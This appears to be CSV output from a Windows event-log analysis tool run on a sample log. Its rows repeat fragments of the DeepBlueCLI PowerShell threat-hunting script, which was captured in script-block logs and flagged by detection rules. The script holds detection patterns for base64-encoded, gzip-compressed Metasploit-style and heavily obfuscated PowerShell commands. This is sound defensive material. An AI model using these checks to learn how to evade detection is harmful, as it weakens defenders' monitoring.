@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:11:27.672 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if 